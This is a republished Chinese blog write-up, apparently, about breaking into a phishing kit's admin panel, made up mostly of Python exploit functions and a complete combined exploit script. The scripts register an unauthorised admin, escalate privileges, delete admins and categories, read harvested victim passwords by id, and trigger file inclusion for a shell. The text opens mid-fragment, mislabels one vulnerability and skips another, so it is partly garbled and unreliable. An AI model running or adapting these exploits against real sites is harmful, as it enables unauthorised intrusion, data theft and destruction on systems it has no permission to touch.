時間:2023-07-22 03:03:01 | 來源:網(wǎng)站運營
時間:2023-07-22 03:03:01 來源:網(wǎng)站運營
干貨技術(shù),記載釣魚網(wǎng)站的多次滲透:記一次對釣魚網(wǎng)站的多次滲透$data['username'] = I('post.p','','md5');$data['password'] = I('post.c','','md5');
然后它竟然直接進行進行添加管理員了,不過這個管理員不是超級管理員,但是可以登錄后臺就已經(jīng)足夠了,下面有個漏洞是提權(quán)python def RegAdmin(): domain="127.0.0.1" username="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) password="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded' } data="p="+username+"&c="+password flag = requests.post("http://"+domain+"/admin.php/login/regist", data=data,headers=headers).text.find("//u8d26//u53f7//u5bc6//u7801//u521b//u5efa//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability /nUserName: "+hashlib.md5(username.encode("utf-8")).hexdigest()+" PassWord: "+password else: return "Failure To Exploit A Vulnerability"
漏洞二 將普通管理員提權(quán)到超級管理員 我們看到驗證管理員的邏輯是這樣的,它先從session取出管理員的id然后進行查詢 判斷字段 is_all 是否等于1,如果是1則不是管理員,反之 我們只需要社工管理員讓他刪掉我們的賬戶,我們就可以跳過這個認證,成為超級管理員python def classdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/Class/classdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞四 越權(quán)刪除超級管理員 直接將post過來的id進行刪除,只能刪除超級管理員python def userdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞五 越權(quán)刪除釣魚密碼 直接將post過來的id進行刪除,不能刪除含有普通管理員id的python def userdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞五 越權(quán)查看釣魚密碼 直接將get過來的id進行查詢python def GetPass(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'Cookie': cookie } username="" password="" result=requests.get("http://"+domain+"/admin.php/pass/uppass/id/"+str(id)+".html",headers=headers).text searchObj = re.search(r'id="username"/s+/S+/s+value="(/S+)"', result, re.M | re.I) searchObj2 = re.search(r'id="password"/s+/S+/s+value="(/S+)"', result, re.M | re.I) try: username = searchObj.group(1) password = searchObj2.group(1) except Exception: return "Failure To Exploit A Vulnerability" return username+"-----"+password; return result
漏洞六 GetShell 文件包含 前提是能在目標服務(wù)器上傳.html后綴的文件python def uptemple(filename): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "u="+filename flag = requests.post("http://" + domain + "/admin.php/Temple/uptemple", data=data, headers=headers).text.find("//u4e3b//u9898//u5207//u6362//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" return result
0x04 利用以上漏洞我們已經(jīng)控制了目標服務(wù)器 我們看到這個釣魚網(wǎng)站有很多的模板,還注明了釣魚網(wǎng)站的作者,我們把它釣到的密碼進行刪除 完整 exp python import hashlib import random import requests import re domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" def GetPass(id): global cookie global domain headers = { 'Cookie': cookie } username="" password="" result=requests.get("http://"+domain+"/admin.php/pass/uppass/id/"+str(id)+".html",headers=headers).text searchObj = re.search(r'id="username"/s+/S+/s+value="(/S+)"', result, re.M | re.I) searchObj2 = re.search(r'id="password"/s+/S+/s+value="(/S+)"', result, re.M | re.I) try: username = searchObj.group(1) password = searchObj2.group(1) except Exception: return "Failure To Exploit A Vulnerability" return username+"-----"+password; return result def DelPass(id): global cookie global domain headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookie } flag= requests.post("http://"+domain+"/admin.php/Pass/passdel",data="id="+str(id),headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability" else: return "Failure To Exploit A Vulnerability" def RegAdmin(): global domain username="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) password="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded' } data="p="+username+"&c="+password flag = requests.post("http://"+domain+"/admin.php/login/regist", data=data,headers=headers).text.find("//u8d26//u53f7//u5bc6//u7801//u521b//u5efa//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability /nUserName: "+hashlib.md5(username.encode("utf-8")).hexdigest()+" PassWord: "+password else: return "Failure To Exploit A Vulnerability" def classdel(id): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/Class/classdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" def userdel(id): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" def uptemple(filename): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "u="+filename flag = requests.post("http://" + domain + "/admin.php/Temple/uptemple", data=data, headers=headers).text.find("//u4e3b//u9898//u5207//u6362//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" if __name__=="__main__": print(RegAdmin())添加管理員 print(GetPass(1))獲取密碼 print(DelPass(1))刪除密碼 print(classdel(1))刪除分類 print(userdel(1))刪除管理員 print(uptemple("../test")) 文件包含
關(guān)鍵詞:滲透,魚網(wǎng),技術(shù),干貨,記載
微信公眾號
版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。